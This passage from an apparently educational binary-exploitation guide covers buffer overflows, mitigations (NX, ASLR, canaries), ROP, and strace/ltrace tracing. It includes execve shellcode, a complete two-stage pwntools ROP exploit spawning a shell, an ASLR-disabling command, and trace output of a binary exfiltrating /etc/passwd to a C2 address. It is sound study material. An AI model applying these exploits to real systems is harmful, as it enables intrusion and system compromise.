  • How does the NX bit work at the hardware level (page table permissions)?
  • Why can’t you just mark the stack executable from your exploit?
  • What’s the difference between DEP (Windows) and NX (Linux)?

Book Reference: “Practical Binary Analysis” Ch. 10.2 - Code-Reuse Attacks

6. ASLR (Address Space Layout Randomization)

ASLR randomizes the base addresses of stack, heap, and libraries, making hardcoded addresses unreliable. Defeating it requires information leaks.

Guiding Questions:

  • What parts of memory are randomized (stack, heap, libraries)?
  • Why is the code section (.text) often NOT randomized in binaries without PIE?
  • How do format string bugs or read overflows leak addresses?

Book Reference: “Practical Binary Analysis” Ch. 10.3 - Randomization-Based Defenses

7. Stack Canaries

Canaries are random values placed between the buffer and return address. Before returning, the program checks if the canary is intact; if not, it aborts.

Guiding Questions:

  • Where exactly is the canary placed in the stack frame?
  • How are canaries generated (random, constant, TLS-based)?
  • Can you bypass canaries by leaking their value or using partial overwrites?

Book Reference: “Computer Systems: A Programmer’s Perspective” Ch. 3.10.3 - Stack Corruption Detection

8. Pwntools and Exploit Development

Pwntools is a Python library for writing exploits. It handles process interaction, payload generation, and address packing.

Guiding Questions:

  • What’s the difference between p32() and p64() for packing addresses?
  • How does cyclic() help find the exact overflow offset?
  • When should you use process() vs remote() for local vs remote targets?

Book Reference: Official pwntools documentation (docs.pwntools.com)

Questions to Guide Your Design

  1. How do you determine the exact offset from the buffer start to the return address without source code? Consider pattern generation, crash analysis, and GDB inspection.

  2. When NX is enabled, what existing code can you reuse to achieve your goals? Think about libc functions, PLT entries, and gadgets.

  3. How would you leak a libc address to defeat ASLR in a two-stage exploit? Consider using puts() to print GOT entries.

  4. What strategies work when you can only overflow a small number of bytes (not enough for shellcode)? Think about partial overwrites, ROP, or pointer manipulation.

  5. How do you write shellcode that works regardless of where it’s placed in memory? Consider relative addressing, stack pivoting, and position-independent techniques.

  6. When would you choose ret2libc over ROP, or vice versa? Think about complexity, reliability, and available gadgets.

  7. How do you test your exploits reliably when ASLR is enabled locally? Consider disabling ASLR (echo 0 > /proc/sys/kernel/randomize_va_space) or handling it properly.

  8. What debugging workflow helps when your exploit crashes the program in unexpected ways? Think about core dumps, GDB breakpoints, and payload inspection.

Thinking Exercise

Before writing any exploits, complete these exercises:

  1. Manual Stack Diagram: Draw the complete stack layout for this function call:
    void vulnerable(char *input) {
        char buffer[64];
        strcpy(buffer, input);  // No bounds checking!
    }
    
    int main(int argc, char **argv) {
        if (argc > 1) {
            vulnerable(argv[1]);
        }
        return 0;
    }
    
    • Compile with gcc -fno-stack-protector -z execstack -o vuln vuln.c
    • Run in GDB with breakpoint in vulnerable() after the strcpy()
    • Print the stack: x/24gx $rsp (the buffer, saved RBP, and return address sit at and above RSP, so start the dump there; gx shows 8-byte values, which suits x64)
    • Identify: buffer location, saved RBP, return address
    • Calculate the offset: how many bytes from buffer[0] to return address?
  2. Shellcode Analysis: Examine this x64 shellcode:
    xor rsi, rsi         ; NULL (argv)
    mul rsi              ; RAX = RDX = 0
    mov rbx, 0x68732f2f6e69622f  ; "/bin//sh" reversed
    push rbx
    push rsp
    pop rdi              ; RDI points to "/bin//sh"
    mov al, 0x3b         ; syscall number for execve
    syscall
    
    • Why use xor rsi, rsi instead of mov rsi, 0?
    • Why is the string “/bin//sh” instead of “/bin/sh”?
    • What’s the syscall number for execve on x64 Linux?
    • Assemble it and verify it has no null bytes
  3. Pattern Offset Calculation:
    from pwn import *
    
    # Generate a cyclic pattern
    pattern = cyclic(200)
    print(pattern)
    
    # Feed it to the vulnerable program
    # Say it crashes with RIP = 0x6161616c ('laaa')
    
    # Find the offset
    offset = cyclic_find(0x6161616c)
    print(f"Offset to RIP: {offset}")
    
    • Run this against a vulnerable binary
    • Verify the offset by sending b'A' * offset + b'BBBBBBBB'
    • Confirm RIP becomes 0x4242424242424242 (BBBBBBBB)
  4. NX Bypass Conceptual: Given a binary with NX enabled:
    • List all functions in the PLT (objdump -d vuln | grep @plt)
    • Find system@plt and puts@plt addresses
    • Locate the string “/bin/sh” in libc using strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 | grep /bin/sh
    • Conceptually design a ret2libc attack:
      payload = b'A' * offset
      payload += p64(pop_rdi_ret)    # Gadget to set RDI
      payload += p64(binsh_addr)     # Argument: "/bin/sh"
      payload += p64(system_addr)    # Call system
      

The Interview Questions They’ll Ask

  1. “Walk me through the exact steps of a buffer overflow from overwrite to code execution.” Expected: Unsafe function → overflow buffer → overwrite saved RBP → overwrite return address → ret instruction loads attacker’s address → control flow hijacked.

  2. “Why does the stack grow downward but arrays grow upward? How does this enable overflows?” Expected: Historical architecture decision. Arrays grow toward higher addresses, so overflow overwrites later stack data (saved pointers, return addresses).

  3. “Explain the difference between controlling RIP and actually executing your payload.” Expected: Controlling RIP just redirects execution. Without executable stack (NX), you must point to existing code or use ROP. With exec stack, you can point to your shellcode.

  4. “How does ASLR prevent exploitation, and how do you defeat it?” Expected: ASLR randomizes addresses, breaking hardcoded values. Defeat with info leaks (format strings, read overflows) or partial overwrites (only modify least significant bytes).

  5. “What’s a stack canary and how would you bypass it?” Expected: Random value between buffer and return address. Bypass by: leaking canary value, overwriting without corrupting it, or using other vulnerabilities (format string).

  6. “Explain ret2libc. Why is it used when NX is enabled?” Expected: Return to existing library functions (like system()) instead of shellcode. Works because libc is executable and always loaded.

  7. “You have a 12-byte overflow but need 100+ bytes for shellcode. What are your options?” Expected: (1) ROP chain, (2) stack pivot to larger buffer elsewhere, (3) two-stage exploit (small stub to read larger payload), (4) ret2libc (no shellcode needed).

  8. “How do you calculate the exact offset to the return address?” Expected: Methods: (1) cyclic pattern + crash analysis, (2) GDB to examine stack, (3) source code analysis, (4) trial and error with increasing payloads.

  9. “What’s the purpose of NOP sled in shellcode exploits?” Expected: Provides margin of error. If you’re not sure of exact shellcode address, point anywhere in the NOPs (0x90) and execution slides to the shellcode.

  10. “Describe a real-world scenario where buffer overflow exploitation is still relevant today.” Expected: IoT devices (often no ASLR/NX), legacy systems, kernel exploits, CTF competitions, security research/testing.

Books That Will Help

| Topic | Book | Chapter/Section |
| --- | --- | --- |
| Stack Layout & Function Calls | “Computer Systems: A Programmer’s Perspective” | Ch. 3.7 (Procedures, Stack Frames) |
| Buffer Overflow Fundamentals | “Hacking: The Art of Exploitation” | Ch. 2.5 (Buffer Overflows) |
| Shellcode Writing | “Hacking: The Art of Exploitation” | Ch. 5 (Shellcode) |
| Return Address Hijacking | “Computer Systems: A Programmer’s Perspective” | Ch. 3.7.3 (Data Transfer) |
| Security Mitigations (NX, ASLR, Canaries) | “Computer Systems: A Programmer’s Perspective” | Ch. 3.10.3 (Stack Corruption Detection) |
| Code-Reuse Attacks (ret2libc) | “Practical Binary Analysis” | Ch. 10.2 (Code-Reuse Attacks) |
| ASLR and Randomization | “Practical Binary Analysis” | Ch. 10.3 (Randomization Defenses) |
| Low-Level Memory Layout | “Low-Level Programming” | Ch. 8 (Memory Management) |
| Exploitation Techniques | “The Shellcoder’s Handbook” | Ch. 4-5 (Stack Overflows) |
| Assembly for Exploitation | “Low-Level Programming” | Ch. 3-4 (Assembly Language) |
| Debugging with GDB | “Hacking: The Art of Exploitation” | Ch. 2 (Programming, Debugging) |
| Format String Exploits | “Hacking: The Art of Exploitation” | Ch. 3 (Exploitation) |
| Heap Exploitation Intro | “The Shellcoder’s Handbook” | Ch. 7 (Heap Overflows) |
| Pwntools Usage | Official Pwntools Docs | docs.pwntools.com |
| Modern Exploitation | “A Guide to Kernel Exploitation” | Ch. 1-2 (Background, Stack Overflows) |

Project 8: Return-Oriented Programming (ROP)

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Python (pwntools)
  • Alternative Programming Languages: Assembly understanding
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 4: Expert
  • Knowledge Area: Advanced Exploitation / Code Reuse
  • Software or Tool: ROPgadget, ropper, pwntools
  • Main Book: “The Shellcoder’s Handbook”

What you’ll build: Complex ROP chains that bypass NX protection by chaining together code snippets already in the binary.

Why it teaches binary analysis: ROP is the foundation of modern exploitation. It demonstrates deep understanding of calling conventions and code reuse.

Core challenges you’ll face:

  • Finding gadgets → maps to instruction sequences ending in ret
  • Chaining gadgets → maps to building functionality from fragments
  • Setting up arguments → maps to calling conventions (rdi, rsi, rdx)
  • Calling system() → maps to executing /bin/sh

Resources for key challenges:

Key Concepts:

  • Gadget Types: “The Shellcoder’s Handbook” Ch. 9
  • x64 Calling Convention: System V ABI
  • Stack Pivoting: ROP Emporium tutorials

Difficulty: Expert
Time estimate: 2-3 weeks
Prerequisites: Project 7 (Buffer Overflow)

Real world outcome:

Deliverables:

  • Analysis output or tooling scripts
  • Report with control/data flow notes

Validation checklist:

  • Parses sample binaries correctly
  • Findings are reproducible in debugger
  • No unsafe execution outside lab

```python
from pwn import *

elf = ELF('./target')
libc = ELF('./libc.so.6')
rop = ROP(elf)
p = process('./target')
offset = 72   # padding to the saved return address (found via cyclic/GDB)

# Find gadgets
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
ret = rop.find_gadget(['ret'])[0]

# Stage 1: leak a libc address
payload = flat(
    b'A' * offset,
    pop_rdi, elf.got['puts'],   # Argument: puts@GOT
    elf.plt['puts'],            # Call puts to leak it
    elf.symbols['main']         # Return to main for the second stage
)

p.sendline(payload)
leaked = u64(p.recv(6).ljust(8, b'\x00'))
libc.address = leaked - libc.symbols['puts']

# Stage 2: call system("/bin/sh")
bin_sh = next(libc.search(b'/bin/sh'))
system = libc.symbols['system']

payload2 = flat(
    b'A' * offset,
    ret,                        # Stack alignment
    pop_rdi, bin_sh,
    system
)

p.sendline(payload2)
p.interactive()
```


Implementation Hints:

Gadget hunting:
```bash
$ ROPgadget --binary ./target | grep "pop rdi"
0x00401233 : pop rdi ; ret
$ ROPgadget --binary ./target | grep "pop rsi"
0x00401231 : pop rsi ; pop r15 ; ret
```

Common ROP patterns:

  1. Leak libc: Call puts(GOT_entry) to leak address
  2. Calculate libc base: leaked_addr - offset = libc_base
  3. Find /bin/sh: Search libc for “/bin/sh” string
  4. Call system: pop rdi; ret + “/bin/sh” addr + system addr

Stack alignment:

  • x64 requires 16-byte stack alignment before call
  • Add a ret gadget if system() crashes

Learning milestones:

  1. Find gadgets → Use ROPgadget or ropper
  2. Chain simple ROP → Control function arguments
  3. Leak libc → Bypass ASLR
  4. Get shell → Complete exploitation chain

The Core Question You’re Answering

How do you construct arbitrary computational logic from tiny fragments of existing code when direct code execution is impossible, and how do you chain these fragments to bypass the most sophisticated memory protection mechanisms?

This project represents the pinnacle of code-reuse attacks. You’ll learn to “program” using only code snippets (gadgets) that already exist in the binary, treating the stack as your instruction stream and gadgets as your instruction set.

Concepts You Must Understand First

1. What is a Gadget?

A gadget is a short instruction sequence ending in ret. Each gadget performs a small operation (like pop rdi; ret) and returns control, allowing you to chain gadgets together.

Gadget anatomy:
   0x401234: pop rdi          ← Useful operation
   0x401235: ret              ← Returns to next gadget

Stack layout during ROP:
   +------------------+
   | Gadget 1 addr    | ← Return here first
   | Data for gadget1 |
   | Gadget 2 addr    | ← Then return here
   | Data for gadget2 |
   | Gadget 3 addr    | ← Then return here
   | ...              |
   +------------------+

Guiding Questions:

  • Why must gadgets end in ret?
  • How does the ret instruction enable chaining?
  • What makes a gadget “useful” vs “junk”?

Book Reference: “Practical Binary Analysis” Ch. 10.2 - Code-Reuse Attacks
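To make the chaining mechanics concrete, here is a toy Python model (not real exploitation code): a list of addresses plays the role of the stack, and a dictionary plays the role of the binary's gadgets. The function name, addresses, and gadget behaviors are all invented for illustration.

```python
# Toy model of ROP execution: the stack becomes the "instruction stream".
# Addresses and gadget behaviors are made up for illustration only.

def run_rop(stack, gadgets):
    """Pop 'return addresses' off the stack and run each gadget in turn."""
    regs = {"rdi": 0}
    sp = 0
    while sp < len(stack):
        addr = stack[sp]          # ret pops the next address off the stack...
        sp += 1
        op = gadgets[addr]        # ...and control lands on that gadget
        if op[0] == "pop_rdi":    # pop rdi; ret -- consumes one stack slot
            regs["rdi"] = stack[sp]
            sp += 1
        elif op[0] == "call":     # terminal "function" gadget
            return op[1], regs["rdi"]
    return None

gadgets = {0x401234: ("pop_rdi",), 0x401500: ("call", "system")}
# Chain: pop rdi; ret  ->  rdi = 0xdeadbeef  ->  system(rdi)
result = run_rop([0x401234, 0xdeadbeef, 0x401500], gadgets)
print(result)  # ('system', 3735928559)
```

The point to notice: control flow is driven entirely by what the "stack" list contains, which is exactly the data a stack-smashing attacker controls.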

2. x64 Calling Convention (System V ABI)

To call functions via ROP, you must understand argument passing: RDI (1st arg), RSI (2nd), RDX (3rd), RCX (4th), R8 (5th), R9 (6th).

Guiding Questions:

  • How do you call `system("/bin/sh")` with ROP? (Hint: set RDI)
  • What’s the difference between x64 and x86 calling conventions?
  • Why do you need `pop rdi; ret` gadgets specifically?

Book Reference: “Low-Level Programming” Ch. 9 - Calling Conventions
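A minimal sketch of what the argument-register order implies for gadget hunting; the helper function is invented for illustration.

```python
# System V AMD64 integer-argument registers, in call order. To invoke
# f(a, b, c) via ROP you must set the first three of these before
# returning into f.
ARG_REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]

def needed_gadgets(nargs):
    """Which pop-gadgets a ROP chain needs for an nargs-argument call."""
    return [f"pop {reg}; ret" for reg in ARG_REGS[:nargs]]

print(needed_gadgets(3))  # ['pop rdi; ret', 'pop rsi; ret', 'pop rdx; ret']
```

In practice the exact gadgets rarely exist in this clean form (e.g. `pop rsi; pop r15; ret` is common), but the register order never changes.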

3. GOT (Global Offset Table) and PLT (Procedure Linkage Table)

The GOT stores addresses of library functions (resolved at runtime). The PLT provides stubs to call them. Leaking GOT entries defeats ASLR.

Program calls printf():
   call printf@PLT  ← PLT stub

PLT stub:
   jmp [printf@GOT]  ← Jump to address in GOT

GOT entry (after first call):
   0x7ffff7a62800  ← Actual printf address in libc

Guiding Questions:

  • Why does the GOT contain real addresses but the PLT doesn’t?
  • How do you leak a GOT entry to find libc base?
  • What’s “lazy binding” and why does it matter for exploitation?

Book Reference: “Computer Systems: A Programmer’s Perspective” Ch. 7.12 - Position-Independent Code

4. Information Leaks for ASLR Bypass

Since ASLR randomizes library addresses, you must leak an address first. Common technique: call `puts(GOT_entry)` to print the address.

Guiding Questions:

  • Why leak puts or printf addresses specifically?
  • How do you calculate libc base from a leaked function address?
  • What’s a “two-stage” exploit and why is it necessary?

Book Reference: “Practical Binary Analysis” Ch. 10.3 - Randomization-Based Defenses
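The leak-to-base arithmetic can be sketched in a few lines. Every number below is a hypothetical example; in a real exploit the offsets come from the target's libc.

```python
# Computing the libc base from a leaked puts address. Under ASLR only the
# base moves, and bases are page-aligned, so the low 12 bits of a symbol
# never change. All values here are hypothetical.
leaked_puts = 0x7f8a12345a90          # runtime leak via puts(puts@GOT)
PUTS_OFFSET = 0x84a90                 # offset of puts in the target libc

libc_base = leaked_puts - PUTS_OFFSET
system = libc_base + 0x52290          # hypothetical offset of system

assert libc_base & 0xfff == 0         # sanity check: bases are page-aligned
print(hex(libc_base))
```

If that final assertion fails, the leak or the offset is wrong, which is a cheap sanity check to build into every exploit script.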

5. Stack Alignment Requirements

x64 requires the stack pointer (RSP) to be 16-byte aligned before executing a `call` instruction. Misalignment causes segfaults.

Guiding Questions:

  • Why does `system()` crash when called from ROP but work from ret2libc?
  • How does adding a `ret` gadget fix alignment?
  • What happens when RSP is misaligned (e.g., RSP % 16 != 0)?

Book Reference: System V ABI x86-64 specification
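A toy model of the alignment rule, with a hypothetical (16-byte-aligned) starting RSP: each 8-byte chain entry consumed by a `ret` or `pop` moves RSP by 8, so adding one padding `ret` gadget flips the alignment.

```python
# Why one extra 'ret' gadget fixes system() crashes: glibc's system() runs
# movaps instructions that fault unless RSP % 16 == 0 at the call.
RSP_START = 0x7ffc00000000   # hypothetical, 16-byte aligned

def rsp_after(entries_consumed):
    # every 8-byte chain entry popped via ret moves RSP up by 8
    return RSP_START + 8 * entries_consumed

print(rsp_after(3) % 16)  # 8  -> misaligned: system() would crash here
print(rsp_after(4) % 16)  # 0  -> one padding 'ret' restores alignment
```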

6. Gadget Types and Their Uses

Different gadget types serve different purposes:

  • Argument gadgets: `pop rdi; ret` (set function arguments)
  • Arithmetic gadgets: `add rax, rbx; ret` (compute values)
  • Memory gadgets: `mov [rax], rbx; ret` (write memory)
  • Control gadgets: `jmp rax` (indirect control flow)

Guiding Questions:

  • Which gadget types are essential for basic exploitation?
  • How do you handle functions requiring 3+ arguments?
  • What do you do when the perfect gadget doesn’t exist?

Book Reference: “The Shellcoder’s Handbook” Ch. 9 - Return-Oriented Programming
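When the perfect gadget doesn't exist, the hunt often drops down to raw byte scanning. The bytes below are fabricated, but the two-byte encoding `0x5f 0xc3` really is `pop rdi; ret`, which is why "unintended" gadgets inside longer instructions are usable.

```python
# Finding 'pop rdi; ret' the hard way: scan executable bytes for its
# encoding (0x5f 0xc3). The .text bytes here are fabricated for the demo.
code = bytes.fromhex("4889e55fc3909048315fc3")

offsets = [i for i in range(len(code)) if code[i:i+2] == b"\x5f\xc3"]
print(offsets)  # [3, 9] -- byte offsets of candidate gadgets
```

Tools like ROPgadget do exactly this (plus disassembly filtering) across the whole binary.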

7. Libc Database and Version Fingerprinting

Different libc versions have functions at different offsets. To find the right libc, you fingerprint it by leaking multiple addresses.

Guiding Questions:

  • Why can’t you just hardcode libc offsets?
  • How does a libc database service (such as libc.rip or the libc-database tool) help find the right version?
  • What happens if you use the wrong libc version in your exploit?

Book Reference: CTF writeups and online resources (libc.blukat.me, libc.rip)
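The fingerprinting itself is simple arithmetic: ASLR slides the whole library by a page-aligned base, so the low 12 bits of each leaked symbol are invariant and can be fed to a libc database. The leaked addresses below are hypothetical.

```python
# libc version fingerprinting: only the base moves under ASLR, so the
# low 12 bits (page offset) of every symbol identify the libc build.
leaks = {"puts": 0x7f3c1e284a90, "gets": 0x7f3c1e2841b0}  # hypothetical

fingerprint = {name: addr & 0xfff for name, addr in leaks.items()}
print({k: hex(v) for k, v in fingerprint.items()})
# {'puts': '0xa90', 'gets': '0x1b0'} -> query a libc database with these
```

Two or three symbols usually narrow the candidates down to a single libc build.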

8. Advanced ROP Techniques

Beyond basic ROP:

  • Stack pivoting: Move RSP to a controlled buffer
  • SROP (Sigreturn ROP): Use `sigreturn` to set all registers
  • JOP (Jump-Oriented Programming): Use `jmp` instead of `ret`
  • ret2csu: Use `__libc_csu_init` for arbitrary gadgets

Guiding Questions:

  • When do you need stack pivoting?
  • What makes SROP powerful (hint: it sets ALL registers)?
  • Why is `__libc_csu_init` present in every dynamically linked binary?

Book Reference: “Practical Binary Analysis” Ch. 10.2.3 - Advanced ROP

Questions to Guide Your Design

  1. How do you find gadgets when automated tools like ROPgadget fail or miss useful sequences? Consider manual searching, analyzing compiler-generated code, and understanding common instruction patterns.

  2. What’s your strategy when you need a gadget that doesn’t exist in the binary? Think about combining multiple gadgets, using library functions, or finding equivalent sequences.

  3. How would you structure a ROP chain that calls multiple functions in sequence (e.g., `mprotect()` then `shellcode()`)? Consider stack layout, argument setup, and return addresses.

  4. When you leak a libc address, how do you reliably identify which libc version is running? Think about fingerprinting multiple functions, libc databases, and offset patterns.

  5. How do you debug a ROP chain that crashes midway through execution? Consider GDB breakpoints on gadgets, stack inspection, and pwntools logging.

  6. What approach works when ASLR is enabled but you can’t find a good leak primitive? Think about partial overwrites, brute force, or other information disclosure vulnerabilities.

  7. How would you automate ROP chain generation for repeated exploitation? Consider pwntools’ ROP class, custom scripts, and chain templates.

  8. When exploiting a remote service, how do you handle the lack of direct debugging access? Think about local replication, binary analysis, and remote crash behavior.
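For question 7 (automating chain generation), here is a pure-Python sketch of a chain-template helper in the spirit of pwntools' ROP class. All addresses are hypothetical placeholders.

```python
import struct

# A declarative chain-template helper: name the gadgets once, then
# describe calls. Gadget and function addresses are hypothetical.
GADGETS = {"pop_rdi": 0x401234, "ret": 0x40101a}

def call1(func, arg0):
    """Chain fragment for a one-argument call: pop rdi; ret -> arg0 -> func."""
    return [GADGETS["pop_rdi"], arg0, func]

def pack(chain, padding=72):
    """Prefix padding up to the saved return address, then 64-bit LE slots."""
    return b"A" * padding + b"".join(struct.pack("<Q", v) for v in chain)

payload = pack(call1(0x401050, 0x404018))  # e.g. puts(puts@GOT)
print(len(payload))  # 96 = 72 padding + 3 chain slots * 8 bytes
```

Templates like `call1` make two-stage exploits mostly declarative: stage 1 and stage 2 become lists of calls rather than hand-packed bytes.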

Thinking Exercise

Before building complex ROP chains, complete these exercises:

  1. Manual Gadget Discovery: Take a simple binary and manually search for gadgets using objdump.

  2. Stack Layout Visualization: Draw the complete stack layout for a ROP chain step by step.

  3. Libc Leak Practice: Practice calculating libc base from leaked GOT entries.

  4. Building a Simple ROP Chain: Write a complete ROP chain to call write(1, buffer, 100).
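A sketch of what exercise 4 asks for: `write(1, buffer, 100)` needs RDI, RSI and RDX set. Every address below is hypothetical; on a real target they come from ROPgadget/ropper output and the binary's symbol table.

```python
import struct

# ROP chain for write(1, buf, 100). Addresses are hypothetical.
POP_RDI     = 0x401234   # pop rdi; ret
POP_RSI_R15 = 0x401232   # pop rsi; pop r15; ret (r15 swallows a junk slot)
POP_RDX     = 0x4011f0   # pop rdx; ret (rare; ret2csu is the usual fallback)
WRITE_PLT   = 0x401060   # write@plt
BUF         = 0x404100   # address of the data to print

chain = [
    POP_RDI, 1,            # arg 1: fd = 1 (stdout)
    POP_RSI_R15, BUF, 0,   # arg 2: buf, plus junk for the extra pop r15
    POP_RDX, 100,          # arg 3: count
    WRITE_PLT,             # finally return into write()
]
payload = b"A" * 72 + b"".join(struct.pack("<Q", v) for v in chain)
print(len(payload))  # 136 = 72 padding + 8 chain slots * 8 bytes
```

Note how the junk slot for `pop r15` is part of the chain layout: drawing the stack (exercise 2) makes slots like this obvious.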

The Interview Questions They’ll Ask

  1. “Explain ROP at a high level. Why is it called ‘return-oriented’?” Expected: Uses `ret` instruction to chain code snippets (gadgets). Each gadget ends with `ret`, which loads the next gadget’s address from the stack.

  2. “How do you call system(‘/bin/sh’) using ROP on x64?” Expected: Need `pop rdi; ret` to set RDI = “/bin/sh” address, then call `system@plt` or leak libc and call libc’s `system`.

  3. “What’s the difference between a gadget and regular shellcode?” Expected: Shellcode is custom assembly you inject. Gadgets are existing code fragments you reuse. ROP works when stack is non-executable (NX).

  4. “Why do you need to leak libc addresses? Can’t you just use hardcoded offsets?” Expected: ASLR randomizes libc base address on each execution. Must leak a known function’s address to calculate base.

  5. “Walk me through a two-stage ROP exploit that defeats ASLR.” Expected: Stage 1: Leak libc address (puts(GOT_entry)), return to main. Stage 2: Use leaked address to calculate libc base, call system(“/bin/sh”).

  6. “What’s stack alignment and why does system() crash in ROP but not normally?” Expected: x64 requires RSP % 16 == 0 before `call`. Normal code maintains this, but ROP might not. Fix: add `ret` gadget for alignment.

  7. “How do you find gadgets when ROPgadget doesn’t find what you need?” Expected: Manual searching with objdump, looking for unintended gadgets (instructions misaligned), using ret2csu or other universal gadgets.

  8. “Explain the GOT and PLT. How do you leak a GOT entry?” Expected: PLT stubs call functions via GOT. GOT contains actual addresses (after lazy binding). Leak: call puts(GOT_entry) to print the address.

  9. “What’s ret2csu and why is it useful?” Expected: `__libc_csu_init` function contains gadgets to control RDI, RSI, RDX. Present in dynamically linked binaries built against glibc before 2.34 (later versions dropped it). Provides universal gadgets.

  10. “Describe a scenario where ROP is necessary vs simpler exploitation techniques.” Expected: NX prevents shellcode execution. Stack canaries prevent simple overwrites. ASLR prevents hardcoded addresses. ROP bypasses all three.

Books That Will Help

Topic Book Chapter/Section
ROP Fundamentals “Practical Binary Analysis” Ch. 10.2 (Code-Reuse Attacks)
Advanced ROP Techniques “Practical Binary Analysis” Ch. 10.2.3 (Advanced ROP, SROP)
Calling Conventions (x64) “Low-Level Programming” Ch. 9 (Calling Conventions)
GOT/PLT Mechanism “Computer Systems: A Programmer’s Perspective” Ch. 7.12 (Position-Independent Code)
ROP Theory “The Shellcoder’s Handbook” Ch. 9 (Return-Oriented Programming)
Stack Alignment System V ABI x86-64 Specification Section 3.2.2 (The Stack Frame)
ASLR and Bypasses “Practical Binary Analysis” Ch. 10.3 (Randomization Defenses)
Dynamic Linking “Computer Systems: A Programmer’s Perspective” Ch. 7 (Linking)
Exploitation Techniques “Hacking: The Art of Exploitation” Ch. 5 (Shellcode)
Pwntools for ROP Official Pwntools Docs docs.pwntools.com/rop.html
Assembly (x64) “Low-Level Programming” Ch. 3-4 (Assembly Language)
ret2csu Technique CTF Writeups Multiple sources online
Gadget Hunting “The Shellcoder’s Handbook” Ch. 9.2 (Finding Gadgets)
Stack Pivoting “Practical Binary Analysis” Ch. 10.2.3 (Advanced Techniques)
Sigreturn-Oriented Programming Research Papers “Framing Signals—A Return to Portable Shellcode”

Project 9: Dynamic Analysis with strace/ltrace

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Command line tools
  • Alternative Programming Languages: Python for automation
  • Coolness Level: Level 2: Practical but Forgettable
  • Business Potential: 1. The “Resume Gold”
  • Difficulty: Level 1: Beginner
  • Knowledge Area: Dynamic Analysis / System Calls
  • Software or Tool: strace, ltrace, Linux
  • Main Book: “The Linux Programming Interface” by Michael Kerrisk

What you’ll build: Analyze unknown binaries using only system call and library call tracing, without disassembly.

Why it teaches binary analysis: Sometimes you don’t need disassembly. Seeing what files a program opens and what APIs it calls reveals a lot.

Core challenges you’ll face:

  • Understanding syscall output → maps to knowing what each syscall does
  • Filtering noise → maps to focusing on interesting calls
  • Following child processes → maps to fork/exec tracing
  • Interpreting library calls → maps to understanding libc functions

Resources for key challenges:

Key Concepts:

  • System Calls: “The Linux Programming Interface” Ch. 3
  • Library Calls: ltrace man page
  • Process Tracing: strace man page

Difficulty: Beginner
Time estimate: 3-5 days
Prerequisites: Basic Linux command line

Real world outcome:

Deliverables:

  • Analysis output or tooling scripts
  • Report with control/data flow notes

Validation checklist:

  • Parses sample binaries correctly
  • Findings are reproducible in debugger
  • No unsafe execution outside lab

```bash
$ strace -f ./suspicious_binary 2>&1 | head -50
execve("./suspicious_binary", ...) = 0
openat(AT_FDCWD, "/etc/passwd", O_RDONLY) = 3     # Reading password file!
read(3, "root:x:0:0:...", 4096) = 2847
close(3) = 0
socket(AF_INET, SOCK_STREAM, 0) = 4               # Opening socket!
connect(4, {sa_family=AF_INET, sin_port=htons(1337),
        sin_addr=inet_addr("10.0.0.1")}, 16) = 0  # Connecting to C2!
write(4, "root:x:0:0:...", 2847) = 2847           # Exfiltrating data!

$ ltrace ./crackme
__libc_start_main(...)
puts("Enter password: ")
fgets("test\n", 100, stdin)
strlen("test\n") = 5
strcmp("test", "s3cr3t_p4ss") = -1                # Password revealed!
puts("Wrong!")
```


Implementation Hints:

Useful strace options:
```bash
strace -f          # Follow child processes
strace -e open     # Only trace open() calls
strace -e file     # All file-related calls
strace -e network  # All network-related calls
strace -s 1000     # Show 1000 chars of strings
strace -o log.txt  # Output to file
strace -p PID      # Attach to running process
```

Useful ltrace options:

```bash
ltrace -e strcmp   # Only trace strcmp
ltrace -e '*'      # All library calls
ltrace -C          # Demangle C++ names
ltrace -n 2        # Show 2 levels of nesting
```

Analysis workflow:

  1. Run with strace to see syscalls
  2. Run with ltrace to see library calls
  3. Look for interesting patterns:
    • File operations (what does it read/write?)
    • Network operations (where does it connect?)
    • String comparisons (password checks?)
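The triage step of this workflow can be scripted. This sketch parses a fabricated strace excerpt and keeps only file and network activity, discarding the noise.

```python
import re

# Minimal strace-log triage: extract file opens and network connects.
# The log lines are fabricated but follow standard strace output format.
log = """\
openat(AT_FDCWD, "/etc/passwd", O_RDONLY) = 3
mmap(NULL, 8192, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f12a4c00000
connect(4, {sa_family=AF_INET, sin_port=htons(1337), sin_addr=inet_addr("10.0.0.1")}, 16) = 0
"""

interesting = []
for line in log.splitlines():
    m = re.match(r'openat\(.*?"([^"]+)"', line)   # first quoted arg = path
    if m:
        interesting.append(("file", m.group(1)))
    m = re.search(r'inet_addr\("([^"]+)"\)', line)  # destination IP
    if m:
        interesting.append(("net", m.group(1)))

print(interesting)  # [('file', '/etc/passwd'), ('net', '10.0.0.1')]
```

Feeding `strace -o log.txt` output through a filter like this turns a thousand-line trace into a short list of indicators.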

Learning milestones:

  1. Trace basic program → Understand output format
  2. Find password checks → strcmp/memcmp in ltrace
  3. Trace network activity → socket/connect/send
  4. Analyze malware behavior → Without disassembly

The Core Question You’re Answering

“Can we understand what a program does by watching it interact with the operating system, without ever looking at its source code or disassembly?”

This project explores the power of behavioral analysis through system call and library call tracing. You’ll learn that sometimes the most revealing information about a program comes not from what it is, but from what it does—every file it touches, every network connection it makes, every string it compares.

Concepts You Must Understand First

  1. System Calls (syscalls)
    • The boundary between user space and kernel space—how programs request services from the OS
    • Every file operation, network connection, or process creation goes through syscalls
    • Understanding syscalls reveals a program’s interactions with the outside world

    Guiding Questions:

    • Why can’t user-space programs directly access hardware or files?
    • What’s the difference between a library call like fopen() and a syscall like open()?
    • How does the kernel validate syscall arguments to prevent malicious programs from harming the system?

    Book References:

    • “The Linux Programming Interface” by Michael Kerrisk - Chapter 3: System Programming Concepts
    • “Computer Systems: A Programmer’s Perspective” (CS:APP) - Chapter 8.4: Process Control (syscall mechanics)
    • “Low-Level Programming” by Igor Zhirkov - Chapter 2.5: System Calls
  2. Process Memory Layout
    • How programs are loaded into memory (text, data, stack, heap segments)
    • Understanding memory addresses in strace output (e.g., mmap() calls)
    • Why programs request memory from the OS via brk() or mmap()

    Guiding Questions:

    • What does it mean when strace shows brk(0x5555555a2000) = 0x5555555a2000?
    • Why do programs use mmap() instead of just allocating with malloc()?
